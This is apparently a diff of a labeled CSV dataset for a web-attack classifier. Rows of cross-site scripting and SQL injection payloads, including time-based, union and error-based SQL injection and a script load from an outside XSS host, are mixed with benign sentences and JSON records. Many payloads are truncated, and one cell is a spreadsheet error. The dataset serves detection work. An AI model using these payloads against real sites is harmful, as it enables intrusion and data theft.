datasrc=""#X"">",1,XSS,1546 +"-1422%"" ) or make_set ( 9539 = 9519,9519 ) and ( """,2,SQLi,18850 +"1%' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171",2,SQLi,15269 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10799 +"<fieldset onkeypress=""alert(1)"" contenteditable>te",1,XSS,4514 +"<bgsound onbeforecut=""alert(1)"" contenteditable>te",1,XSS,5670 +"<multicol oncut=""alert(1)"" contenteditable>test</m",1,XSS,3180 +#ERROR!,2,SQLi,10994 +"1"" ) where 1107 = 1107 and 8189 = ( select count (",2,SQLi,13021 +"<? echo('<scr)'; echo('ipt>alert(\""XSS\"")</script>",1,XSS,1283 +Join discussion.,0,normal,23026 +<marquee id=x tabindex=1 onactivate=alert(1)></mar,1,XSS,8287 +<custom tags onpointerout=alert(1)>XSS</custom tag,1,XSS,6178 +1 ) as ekgx where 9923 = 9923 or 8384 = like ( 'ab,2,SQLi,21851 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2473 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11461 +ORDER BY 24#,2,SQLi,10297 +"<style>@keyframes slidein {}</style><col style=""an",1,XSS,5590 +<button onScroll=javascript:alert(1)>,1,XSS,9663 +"<rb onbeforecut=""alert(1)"" contenteditable>test</r",1,XSS,4469 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10469 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6376 +1' ) as ibqr where 5372 = 5372 and 8312 = dbms_pip,2,SQLi,12380 +"1 or elt ( 6272 = 6272,sleep ( 5 ) ) -- ilfc",2,SQLi,13490 +"{""id"":null,""firstName"":""Jane"",""lastName"":""Koh"",""sp",0,normal,27220 +"{""id"":null,""firstName"":""Ho"",""lastName"":""Kwee Huay""",0,normal,26989 +"<colgroup onmouseover=""alert(1)"">test</colgroup>",1,XSS,6323 "<img\x11src=x onerror=""javascript:alert(1)"">",1,XSS,660 -1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,17225 -"1"" ) ) ) or ( select 2* ( if ( ( select * from ( s",2,SQLi,13662 -if ( 5127 = 2829 ) select 5127 else drop function ,2,SQLi,18346 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20",2,SQLi,10910 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3600 -"<textarea draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,5903 -"1"" ) where 1410 = 1410",2,SQLi,19955 --2300 ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,21024 -Between the years last mentioned-1866-1888 - the c,0,normal,26322 -"<meta onmouseover=""alert(1)"">test</meta>",1,XSS,4295 -"1"" ) ) ) and 5556 = ( select count ( * ) from all_",2,SQLi,20546 -select case when 4537 = 8418 then 1 else null end-,2,SQLi,14593 -WILDFANG Enjoy 20% off of select button-ups and 30,0,normal,25119 -1' where 2913 = 2913 and ( select * from ( select ,2,SQLi,15623 -1' where 7725 = 7725 or ( select * from ( select (,2,SQLi,19317 -truncate,0,normal,23184 -Home Depot: Save up to 40% off select bath & kitch,0,normal,26088 -<canvas onpointerout=alert(1)>XSS</canvas>,1,XSS,4040 -"?base=javascript:alert(0)"",",1,XSS,9870 -word1,0,normal,26538 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,20998 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10679 -"<style>@keyframes x{}</style><strong style=""animat",1,XSS,3915 -"Instead, agencies encourage birth parents to selec",0,normal,25981 -"1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,14277 -1'|| ( select 'hfbt' where 7204 = 7204 union all s,2,SQLi,15295 -1 where 9932 = 9932,2,SQLi,22428 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15341 -"<content draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,2345 -"<textarea onmouseout=""alert(1)"">test</textarea>",1,XSS,3077 -Select edit.,0,normal,24608 -<svg><content onload=alert(1)></content>,1,XSS,5606 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10500 --1479%' or 5201 = 3398--,2,SQLi,15291 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6324 -"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,16138 -"1%"" and ( select 9067 from ( select count ( * ) ,c",2,SQLi,22327 -1'|| ( select 'cjwp' where 8681 = 8681 or 8466 = b,2,SQLi,12746 -<image onpointermove=alert(1)>XSS</image>,1,XSS,7896 -"-8940"" ) or 4144 = ( select upper ( xmltype ( chr ",2,SQLi,18802 -"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,18901 -"iif ( 1746 = 1730,1,1/0 )",2,SQLi,19448 -"1' ) procedure analyse ( extractvalue ( 9627,conca",2,SQLi,21659 -"<?xml-stylesheet type=""text/xml"" href=""#stylesheet",1,XSS,9042 -"1%' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x765",2,SQLi,20237 -select * from users where id = 1 union select 1<@.,2,SQLi,12017 -"<figcaption draggable=""true"" ondragleave=""alert(1)",1,XSS,7529 -<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl,1,XSS,7201 -"-1630' union all select 1971,1971--",2,SQLi,20892 -"-1139 ) or 1 group by concat ( 0x7171706a71, ( sel",2,SQLi,18912 --3044' ) or 4999 = 3051#,2,SQLi,13978 -)) or pg_sleep(__TIME__)--,2,SQLi,10163 -"Extra $50 off select Inspiron & XPS PCs $699+ w/ """,0,normal,26204 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,19684 +"-1889%' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ",2,SQLi,17223 +Select a spot.,0,normal,22795 +"1"" ) where 5850 = 5850 or 1022 = ( select count ( ",2,SQLi,18344 +"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%2",2,SQLi,10912 +"<datalist onclick=""alert(1)"">test</datalist>",1,XSS,3602 +<bgsound id=x tabindex=1 onfocus=alert(1)></bgsoun,1,XSS,5905 +I'm going to give a select group of Guardians back,0,normal,26034 +"-2263' ) where 7931 = 7931 union all select 7931,7",2,SQLi,21022 +"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ",2,SQLi,14147 +"<head onmouseup=""alert(1)"">test</head>",1,XSS,4297 +The retailer is offering 89.503% off of your purch,0,normal,25384 +"1"" and ( select 2* ( if ( ( select * from ( select",2,SQLi,14586 +Customers can select their preferred seats during ,0,normal,26255 +Guys your start your league of four is a TEAMGAME ,0,normal,26494 +"1"" ) ) as nhus where 3689 = 3689",2,SQLi,19315 +"1 where 1096 = 1096 and extractvalue ( 7982,concat",2,SQLi,12259 +"Hover the cursor over ""Account & Lists"" and select",0,normal,26085 +"<style>@keyframes x{}</style><nextid style=""animat",1,XSS,4042 +?userDefined=');function someFunction(a){}alert(1),1,XSS,9872 +word1,0,normal,26535 +1' ) ) as jbcd where 9078 = 9078 and 6969 = ( sele,2,SQLi,20996 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--",2,SQLi,10681 +<form onpointerleave=alert(1)>XSS</form>,1,XSS,3917 +Invalids can select activities such as swimming an,0,normal,25978 +"1"" ) ) as nsbu where 6569 = 6569 or sleep ( 5 ) #",2,SQLi,17629 +"1 ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 8600 ",2,SQLi,21299 +Create a memorable photograph.,0,normal,22742 +"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'gt",2,SQLi,15333 +"<style>@keyframes x{}</style><head style=""animatio",1,XSS,2346 +<kbd onpointerout=alert(1)>XSS</kbd>,1,XSS,3078 +Select cut.,0,normal,24605 +<noembed onblur=alert(1) tabindex=1 id=x></noembed,1,XSS,5608 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10502 +"1"" where 7245 = 7245 and 9198 = 9198--",2,SQLi,15283 +"<button onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,6326 +-4384' ) ) ) or 6872 = 6872 and ( ( ( 'ukhl' = 'uk,2,SQLi,14491 +1' in boolean mode ) and 2716 = ( select count ( *,2,SQLi,22325 +"1"" ) where 3404 = 3404 and 8148 = like ( 'abcdefg'",2,SQLi,12739 +"<style>@keyframes x{}</style><datalist style=""anim",1,XSS,7898 +1'+ ( select 'myrb' where 3622 = 3622 and 6510 = (,2,SQLi,18800 +"-3626%"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 1",2,SQLi,18899 +Join the discussion forum.,0,normal,22732 +1'|| ( select 'yags' where 6268 = 6268 and 3707 = ,2,SQLi,21657 +"<A href=""javascript%26colon;confirm()"">click",1,XSS,9044 +"1"" or sleep ( 5 ) #",2,SQLi,21401 +select * from users where id = 1 or $+<\ union sel,2,SQLi,12019 +"<mark onkeyup=""alert(1)"" contenteditable>test</mar",1,XSS,7531 +<svg><rb onload=alert(1)></rb>,1,XSS,7203 +"-7676"" ) ) as flov where 7967 = 7967 union all sel",2,SQLi,20890 +-2001'+ ( select 'nput' where 8368 = 8368 union al,2,SQLi,18910 +-2505' or 9323 = 9323#,2,SQLi,20299 +&apos;%20OR,2,SQLi,10165 +"Extra 220% – 220% off select items with code SALE,",0,normal,26201 +1' or 5286 = ( select count ( * ) from all_users t,2,SQLi,19682 "<base href=""javascript:/a/-alert(1)///////""><a hre",1,XSS,158 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4077 -"<u draggable=""true"" ondragstart=""alert(1)"">test</u",1,XSS,8381 -<datalist id=x tabindex=1 onbeforedeactivate=alert,1,XSS,3578 -select,0,normal,26598 -select case when 3819 = 1887 then 1 else null end-,2,SQLi,17624 -<hr id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6210 -"<strike onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,5857 -Retrieve records where needed.,0,normal,23469 -"-4669"" or 8571 = 8571--",2,SQLi,13421 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19252 -1 ) ) as fqee where 3286 = 3286,2,SQLi,19007 -"<summary draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,6115 -Select the main dish.,0,normal,24466 -<big onpointermove=alert(1)>XSS</big>,1,XSS,8144 -"{""id"":null,""name"":""forward""}",0,normal,27353 -select ( case when ( 2394 = 4530 ) then 2394 else ,2,SQLi,13488 -<style>:target {color:red;}</style><applet id=x st,1,XSS,4067 -1,0,normal,26659 -"?getURL(javascript:alert(1))"",",1,XSS,9860 -"<style>@keyframes x{}</style><i style=""animation-n",1,XSS,3014 -"-2247' ) union all select 1202,1202,1202,1202,1202",2,SQLi,17958 -Where's your SQL repository?,0,normal,23422 -1' ) ) ) and 3707 = ( select count ( * ) from sysi,2,SQLi,12986 -"1"" where 3678 = 3678 and 6537 = dbms_pipe.receive_",2,SQLi,12805 -1%' and 8312 = dbms_pipe.receive_message ( chr ( 6,2,SQLi,15267 -"<tbody onmousemove=""alert(1)"">test</tbody>",1,XSS,2570 -Select your achievement.,0,normal,24931 -<svg><div onload=alert(1)></div>,1,XSS,3207 -"< STYLE="":expression(alert(''))"">",1,XSS,5631 -"1' ) where 8835 = 8835 or 8384 = like ( 'abcdefg',",2,SQLi,21682 -1 or 5286 = ( select count ( * ) from all_users t1,2,SQLi,13417 -"1"" ) ) ) and 6510 = ( select count ( * ) from sysu",2,SQLi,18849 -1 ) ) ) and 3707 = ( select count ( * ) from sysib,2,SQLi,17538 -Select your slide.,0,normal,25022 -"<tr oncut=""alert(1)"" contenteditable>test</tr>",1,XSS,7246 -"<style>@keyframes x{}</style><applet style=""animat",1,XSS,8621 -end and ( ( ( 4675 = 4675,2,SQLi,20665 -waitfor delay '0:0:5' and ( 'eaxu' = 'eaxu,2,SQLi,16109 -"Select the Twitch app and press ""A"" on your contro",0,normal,25576 -"1' ) and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,22445 -"<summary oncopy=""alert(1)"" contenteditable>test</s",1,XSS,7882 -select,0,normal,26548 -( select ( case when ( 9263 = 9263 ) then 1 else 9,2,SQLi,12830 -"1"" or 2633 = dbms_pipe.receive_message ( chr ( 112",2,SQLi,17307 -"<fieldset onmousedown=""alert(1)"">test</fieldset>",1,XSS,7697 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10552 -"<marquee onbeforepaste=""alert(1)"" contenteditable>",1,XSS,8866 -"( convert ( int, ( select char ( 113 ) +char ( 113",2,SQLi,13247 -"1%"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745",2,SQLi,19314 -The committee will select.,0,normal,24457 -"1"" ) ) or 8315 = ( select count ( * ) from sysibm.",2,SQLi,14799 -"{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in",0,normal,26809 -"<bdi onmouseup=""alert(1)"">test</bdi>",1,XSS,2821 -<style>:target {color:red;}</style><iframe id=x st,1,XSS,5835 -The animation allows the user to select from a num,0,normal,25485 --9711'+ ( select 'ckpj' where 8338 = 8338 union al,2,SQLi,20936 -<tt onpointerout=alert(1)>XSS</tt>,1,XSS,2792 +"<ruby onclick=""alert(1)"">test</ruby>",1,XSS,4079 +"<select onmousedown=""alert(1)"">test</select>",1,XSS,8383 +<style>:target {color: red;}</style><link id=x sty,1,XSS,3580 +Choose fields where valid.,0,normal,23319 +1'+ ( select 'bmit' where 3716 = 3716 and row ( 62,2,SQLi,13860 +"<area onclick=""alert(1)"">test</area>",1,XSS,6212 +"<bdo onmouseup=""alert(1)"">test</bdo>",1,XSS,5859 +"1' ) and extractvalue ( 7982,concat ( 0x5c,0x71717",2,SQLi,17057 +"-3649"" ) ) as eydu where 3220 = 3220 or elt ( 8705",2,SQLi,17474 +Select crops will be grown indoors using hydroponi,0,normal,25633 +"-1668"" ) ) ) or 9323 = 9323#",2,SQLi,15378 +<th onpointerover=alert(1)>XSS</th>,1,XSS,6117 +Select your preferred date.,0,normal,24463 +"<span onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,8146 +"{""id"":null,""name"":""Leavanny""}",0,normal,27352 +1' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||,2,SQLi,15270 +"<strike onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4069 +"1"" ) ) and ( select 2* ( if ( ( select * from ( se",2,SQLi,18563 +"?getURL,javascript:alert(1)"",",1,XSS,9862 +"<style ondblclick=""alert(1)"">test</style>",1,XSS,3015 +"rock mag select, which they did not.",0,normal,25743 +"Their job — Ivry's job — was to eliminate targets,",0,normal,25348 +"-9532 ) ) union all select 6039,6039,6039,6039--",2,SQLi,12979 +( select ( case when ( 6581 = 6581 ) then 1 else c,2,SQLi,12798 +1 ) as obhj where 1789 = 1789 or 2633 = dbms_pipe.,2,SQLi,15259 +"<body onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2571 +Select your victory.,0,normal,24928 +"<shadow onmouseenter=""alert(1)"">test</shadow>",1,XSS,3209 +<main onpointerleave=alert(1)>XSS</main>,1,XSS,5633 +1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) a,2,SQLi,12652 +lag,0,normal,23230 +Select grow.,0,normal,24674 +"1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ",2,SQLi,17536 +-8086%' ) or 4493 = utl_inaddr.get_host_address ( ,2,SQLi,20102 +"<content onpaste=""alert(1)"" contenteditable>test</",1,XSS,7248 +"<ol onmouseenter=""alert(1)"">test</ol>",1,XSS,8623 +1'|| ( select 'mzhj' where 9677 = 9677 union all s,2,SQLi,20663 +"1"" or exp ( ~ ( select * from ( select concat ( 0x",2,SQLi,16101 +Select votes could use a blockchain-based mobile a,0,normal,25573 +"1%' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x54",2,SQLi,17647 +<nextid onblur=alert(1) tabindex=1 id=x></nextid><,1,XSS,7884 +1' ) and 6537 = dbms_pipe.receive_message ( chr ( ,2,SQLi,17581 +Where's the park?,0,normal,23533 +select,0,normal,26562 +<area onpointerout=alert(1)>XSS</area>,1,XSS,7699 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10554 +"<bdo onmouseleave=""alert(1)"">test</bdo>",1,XSS,8868 +Select a destination for the vacation.,0,normal,24056 +"1' ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,21984 +"1"" ) ) as isqj where 6344 = 6344 union all select ",2,SQLi,13177 +select,0,normal,26628 +"{""id"":null,""firstName"":""Xie"",""lastName"":""Jinhuang""",0,normal,26806 +<textarea oninput=alert(1)>XSS</textarea>,1,XSS,2822 +"<nextid onmouseover=""alert(1)"">test</nextid>",1,XSS,5837 +"-7808"" ) ) as jgkk where 9230 = 9230 or elt ( 1032",2,SQLi,20029 +Get select bakeware for up to 20% off this weekend,0,normal,26143 +<dir onblur=alert(1) tabindex=1 id=x></dir><input ,1,XSS,2793 <style onReadyStateChange style onReadyStateChange,1,XSS,389 -Select the next book for our book club.,0,normal,24063 -"1%' union all select null,null,null,null,null,null",2,SQLi,13261 +1 ) where 9432 = 9432 and 6510 = ( select count ( ,2,SQLi,14960 +1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,13254 "{""id"":null,""name"":""wheat""}",0,normal,27543 -"1"" ) ) as nbdc where 4444 = 4444 union all select ",2,SQLi,22036 -1' in boolean mode ) or char ( 119 ) ||char ( 100 ,2,SQLi,17152 -"""></title><script>alert(1111)</script>",1,XSS,1327 -<aside onfocusout=alert(1) tabindex=1 id=x></aside,1,XSS,6898 -1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,13340 -select ( case when ( 6435 = 8988 ) then 6435 else ,2,SQLi,16464 -"<style>@keyframes x{}</style><sub style=""animation",1,XSS,5895 -The service is going to select popular and recent ,0,normal,25378 -"1', ( select ( case when ( 7616 = 7616 ) then 1 el",2,SQLi,19366 -"1"" ) as kuuf where 6908 = 6908",2,SQLi,21862 -[a](JaVaScRiPt:alert(1)),1,XSS,9438 -"1"" where 2365 = 2365 and 3707 = ( select count ( *",2,SQLi,12644 -"<;SCRIPT/XSS SRC="";http://ha.ckers.org/xss.js"";>;<",1,XSS,1651 -",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10874 -"-5529"" or 5903 = ( 'qqpjq'|| ( select case 5903 wh",2,SQLi,21059 -"<element onmouseover=""alert(1)"">test</element>",1,XSS,5249 -1' ) as ssez where 5351 = 5351 or char ( 119 ) ||c,2,SQLi,20343 -"-6194"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,18497 +Select your dream honeymoon destination.,0,normal,24371 +"1' ) where 1225 = 1225 and elt ( 8831 = 7779,7779 ",2,SQLi,17150 +"</textarea>'""><script>alert(document.cookie)</scri",1,XSS,1328 +"<nextid onmouseenter=""alert(1)"">test</nextid>",1,XSS,6900 +from,0,normal,26515 +1' ) where 2928 = 2928 and ( select * from ( selec,2,SQLi,19166 +"<rtc onkeypress=""alert(1)"" contenteditable>test</r",1,XSS,5897 +"The service, called Swiggy Go, is currently limite",0,normal,25375 +1' ) ) as jpxj where 6153 = 6153 or 8156 = ( selec,2,SQLi,16355 +1' ) and 3707 = ( select count ( * ) from sysibm.s,2,SQLi,18278 +"![a](""onerror=""alert(1))",1,XSS,9440 +Join the chat.,0,normal,22857 +"<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert("";XS",1,XSS,1652 +""",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-",2,SQLi,10876 +"1"" or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,15013 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5251 +"iif ( 3204 = 8489,3204,1/0 )",2,SQLi,12404 +"1"" ) where 1699 = 1699 or 4915 = ( select count ( ",2,SQLi,15715 "<a href=""javas\x04cript:javascript:alert(1)"" id=""f",1,XSS,436 -"1%' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x54",2,SQLi,17647 -"1%"" ) ) ) or 6979 = like ( 'abcdefg',upper ( hex (",2,SQLi,16555 -"<header onclick=""alert(1)"">test</header>",1,XSS,7431 -or '1′='1,2,SQLi,9967 -"<shadow oncut=""alert(1)"" contenteditable>test</sha",1,XSS,6542 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,21379 -<br onpointerdown=alert(1)>XSS</br>,1,XSS,6642 -You can also select the same option the dropdown m,0,normal,25098 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2563 -admin' or 1 = 1,2,SQLi,11669 -That science must be left free to determine the ai,0,normal,25491 -1 ) as xuvz where 3061 = 3061 or 2367 = ( select c,2,SQLi,16592 -Select your negotiate.,0,normal,25052 -Save up to 25% off select Grills and Pool Supplies,0,normal,25725 -"-8054' ) ) union all select 5232,5232,5232,5232,52",2,SQLi,18969 -1'|| ( select 'ovlx' where 8767 = 8767 or sleep ( ,2,SQLi,19043 -Select your tournament.,0,normal,24926 -"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 )",2,SQLi,18275 -1'|| ( select 'scct' where 2587 = 2587 and ( selec,2,SQLi,15867 -"<xmp onkeypress=""alert(1)"" contenteditable>test</x",1,XSS,7322 -1'|| ( select 'gnil' from dual where 7552 = 7552 r,2,SQLi,15830 -gone case select hello please,0,normal,26135 -<center onpointerup=alert(1)>XSS</center>,1,XSS,8724 -"1"" where 4345 = 4345 and 4386 = utl_inaddr.get_hos",2,SQLi,12493 -Select your ideal date.,0,normal,24431 -Select copy.,0,normal,24603 -<pre onpointerover=alert(1)>XSS</pre>,1,XSS,6114 -Select your scale.,0,normal,25029 --9484' or ( 7129 = 2349 ) *2349 and 'fcsa' like 'f,2,SQLi,18616 -"<em ondblclick=""alert(1)"">test</em>",1,XSS,8384 -"{""id"":null,""firstName"":""Hoe"",""lastName"":""Siew Lan""",0,normal,26941 -1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,21382 -coerce,0,normal,23228 -"1"" ) where 7165 = 7165 or 8466 = benchmark ( 50000",2,SQLi,12760 -select pg_sleep ( 5 ) and 'rpka' = 'rpka,2,SQLi,13983 -""" Sandeep demonstrated that these numbers can be u",0,normal,26473 -"<body onmousedown=""alert(1)"">test</body>",1,XSS,5029 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6819 -1%' ) and 4061 = 2730#,2,SQLi,13361 -Select a dish from the menu.,0,normal,24190 -"1"" ) as zbhs where 2017 = 2017 or row ( 1045,7562 ",2,SQLi,17294 -1'|| ( select 'xbvz' from dual where 1632 = 1632 u,2,SQLi,16868 -1 ) ) ) and 6510 = ( select count ( * ) from sysus,2,SQLi,13219 -1 ) ) as jfae where 6684 = 6684 and 2716 = ( selec,2,SQLi,15221 +1'|| ( select 'qsgi' where 1707 = 1707 or 9643 = (,2,SQLi,12813 +"-9697 ) union all select 3052,3052,3052,3052,3052,",2,SQLi,16553 +<p id=x tabindex=1 onactivate=alert(1)></p>,1,XSS,7433 +or 1=1 --,2,SQLi,9969 +"<rb oncopy=""alert(1)"" contenteditable>test</rb>",1,XSS,6544 +"-1526"" ) where 4870 = 4870 union all select 4870,4",2,SQLi,21377 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6644 +You can even monitor the temperature and humidity ,0,normal,25095 +"<sup onmouseleave=""alert(1)"">test</sup>",1,XSS,2564 +select * from users where id = 1 union select @||1,2,SQLi,11671 Where did you find that charming cafe?,0,normal,23676 -1'+ ( select snam where 1993 = 1993,2,SQLi,18854 -"<style>@keyframes x{}</style><form style=""animatio",1,XSS,5542 -}alert(/INJECTX/);{//,1,XSS,9836 -"{""id"":null,""firstName"":""Wei Hong"",""lastName"":""Quek",0,normal,27415 -1%' ) ) and ( select * from ( select ( sleep ( 5 ),2,SQLi,19214 -I'm planning to pick up some art supplies.,0,normal,23927 -Select your taste.,0,normal,24887 -1 ) where 4780 = 4780,2,SQLi,19862 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,19434 -"select * from users where id = 1 or "". ( "" or 1 = ",2,SQLi,11402 -""" ) ) or pg_sleep ( __TIME__ ) --",2,SQLi,11787 -"1"" ) ) ) and 5429 = 9596",2,SQLi,17748 -<textarea onbeforepaste=alert(1) autofocus></texta,1,XSS,7328 -1' ) ) ) or 9643 = ( select count ( * ) from domai,2,SQLi,20958 -"<samp onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2997 --3501' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,19333 -Select lunch.,0,normal,24501 +More on how select companies performed when the da,0,normal,25876 +"{""id"":null,""firstName"":""Dexter"",""lastName"":""Tang"",",0,normal,27408 +1'|| ( select 'gved' from dual where 6965 = 6965,2,SQLi,12707 +1' ) where 3636 = 3636 or 4240 = ( select 4240 fro,2,SQLi,18967 +"1%"" ) and 9660 = ( select count ( * ) from all_use",2,SQLi,13324 +Where's the townhouse?,0,normal,23561 +Voters were invited to select their top 10 favorit,0,normal,25181 +"-1692' ) union all select 7074,7074,7074,7074,7074",2,SQLi,18686 +<iframe onpointerover=alert(1)>XSS</iframe>,1,XSS,7324 +1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,15822 +1'+ ( select 'unpz' where 8186 = 8186,2,SQLi,14172 +"<dfn onkeydown=""alert(1)"" contenteditable>test</df",1,XSS,8726 +"1,exp ( ~ ( select * from ( select concat ( 0x7171",2,SQLi,12486 +1 ) ) or 8315 = ( select count ( * ) from sysibm.s,2,SQLi,17685 +"Select ""My apps & games"" from the menu, then selec",0,normal,25676 +<style>:target {color: red;}</style><applet id=x s,1,XSS,6116 +Select your soar.,0,normal,25026 +1 ) as guru where 7615 = 7615 union all select nul,2,SQLi,18614 +<font onpointerenter=alert(1)>XSS</font>,1,XSS,8386 +select ( case when ( 8711 = 6432 ) then 1 else 871,2,SQLi,14031 +-5299 or 2724 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,19729 +position,0,normal,23225 +select,0,normal,26634 +"{""id"":null,""name"":""down""}",0,normal,27113 +""" Then tap ""parental controls"" and select ""enable ",0,normal,26470 +<svg><hr onload=alert(1)></hr>,1,XSS,5031 +<listing onpointerdown=alert(1)>XSS</listing>,1,XSS,6821 +1%' ) or sleep ( 5 ) and ( '%' = ',2,SQLi,13354 +Select a hairstyle for a change.,0,normal,24187 +Select first.,0,normal,24485 +1' ) ) ) and 8635 = ( select count ( * ) from gene,2,SQLi,16866 +"1"" ) ) ) and 7153 = 7474--",2,SQLi,13212 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,18494 +I'm thinking of where to spend my day off.,0,normal,23673 +1'|| ( select 'aevx' from dual where 9999 = 9999,2,SQLi,18852 +"<style>@keyframes x{}</style><br style=""animation-",1,XSS,5544 +<p/onclick=alert(/INJECTX/)>a,1,XSS,9838 +You use your lightsaber to select and place your t,0,normal,25064 +1 ) rlike sleep ( 5 ),2,SQLi,19212 +She chose a workout routine from the fitness app.,0,normal,23924 +"iif ( 5519 = 4796,1,1/0 )",2,SQLi,22054 +"-1844' ) union all select 9572,9572,9572,9572#",2,SQLi,19860 +"1"" ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 9",2,SQLi,19432 +select * from users where id = '1' union select +\,2,SQLi,11404 +or ( EXISTS ),2,SQLi,11789 +"1"" ) as hhxx where 3372 = 3372 or char ( 117 ) ||c",2,SQLi,17746 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7330 +"Select ""Name,"" also at the top of the next tab.",0,normal,25675 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2998 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19331 +"{""id"":null,""name"":""Vegiemon""}",0,normal,27518 "{""id"":null,""name"":""Zubaeagermon""}",0,normal,27489 -"<style>@keyframes x{}</style><option style=""animat",1,XSS,7982 -<keygen onfocusout=alert(1) tabindex=1 id=x></keyg,1,XSS,5735 -"{""id"":null,""firstName"":""Jacob"",""lastName"":""Boe"",""a",0,normal,26862 -<sub onpointerdown=alert(1)>XSS</sub>,1,XSS,8510 -or 1 = 1 --,2,SQLi,11386 -Where is the database file?,0,normal,23458 -"1%"" ) ) ) or 8421 = ( select count ( * ) from gene",2,SQLi,18392 -"{""id"":null,""firstName"":""Gregory"",""lastName"":""Lim"",",0,normal,27515 -"Today, the company is actually launching that feat",0,normal,25240 -"{""id"":null,""firstName"":""志源"",""lastName"":",0,normal,27041 -"1 ) where 6788 = 6788 union all select null,null,n",2,SQLi,13628 -I want to select a new workout routine.,0,normal,23883 -"-2743 union all select 6757,6757,6757,6757,6757,67",2,SQLi,15629 -"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCR",1,XSS,1353 -"<li onbeforecut=""alert(1)"" contenteditable>test</l",1,XSS,3903 -Select bonus categories — Many other cash-back car,0,normal,25643 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7062 -"<object classid=""clsid:02BF25D5-8C17-4B23-BC80-D34",1,XSS,9237 -1 where 3902 = 3902 or 9643 = ( select count ( * ),2,SQLi,12347 -1 ) where 1402 = 1402,2,SQLi,12372 -"&lt;IMG SRC=\""jav&#x09;ascript&#058;alert('XSS');\",1,XSS,1097 -"<table draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,5806 -"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,19993 -"1"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 )",2,SQLi,21403 